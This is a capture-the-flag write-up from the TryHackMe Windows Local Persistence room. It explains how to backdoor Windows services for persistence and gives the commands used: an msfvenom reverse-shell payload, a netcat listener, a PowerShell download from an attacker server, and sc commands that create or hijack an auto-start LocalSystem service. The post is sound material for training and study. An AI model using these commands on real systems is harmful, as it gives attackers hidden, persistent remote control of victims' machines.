In this post, We covered the third part of Windows Persistence Techniques and specifically we covered Backdooring Windows Services as part of TryHackMe Windows Local Persistence.

Windows services offer a great way to establish persistence since they can be configured to run in the background whenever the victim machine is started. If we can leverage any service to run something for us, we can regain control of the victim machine each time it is started.

A service is basically an executable that runs in the background. When configuring a service, you define which executable will be used and select if the service will automatically run when the machine starts or should be manually started.

There are two main ways we can abuse services to establish persistence

  • Create a new service
  • Modify an existing one to execute our payload.

Method 1: Creating a Backdoor Service

My first approach is to create a new service that runs a malicious payload. I’ll use a tool called msfvenom to generate a payload, which is an executable file that will give me a reverse shell. Then, I’ll create a new service and configure it to run this payload automatically on startup.

The downside to this method is that a new, unfamiliar service might look suspicious to a system administrator or anyone investigating a potential security breach.

Method 2: Backdooring an Existing Service

My second method is a bit stealthier. Instead of creating a new service, I’ll modify an existing, legitimate one. I’ll change the service’s “binary path” to point to my malicious payload instead of its original executable. I’ll also set the service to start automatically and change its start name to run as LocalSystem to ensure it has full administrative privileges. This way, my backdoor is hidden within a service that’s expected to be running on the system.

Technical Commands

Here are the commands I used in the terminal throughout the video:

Creating a new service:

  • sc executable create thm service binpath=C:\Users\IEUser\Desktop\payload.exe start=auto
  • sc start thm service 2

Creating a payload with msfvenom:

  • sudo msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.149.124 LPORT=4545 -f exe-service -o payload.exe
  • sudo msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.149.124 LPORT=4545 -f exe-service -o payload_v2.exe

Setting up a Netcat listener:

  • nc -lvp 4545

Downloading a payload with PowerShell:

  • powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://10.10.149.124:8000/payload.exe','C:\Users\IEUser\Desktop\payload.exe')"
  • powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://10.10.149.124:8000/payload_v2.exe','C:\Users\IEUser\Desktop\payload_v2.exe')"

Enumerating services:

  • sc query state= all
  • sc query thm service 3
  • sc qc thm service 3

Reconfiguring an existing service:

  • sc config thm service 3 binpath=C:\Users\IEUser\Desktop\payload_v2.exe start=auto obj=LocalSystem
  • sc start thm service 3

TryHackMe Windows Local Persistence Room Answers

Insert flag7 here
 

Insert flag8 here

 
 

Video Walk-Through

 

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles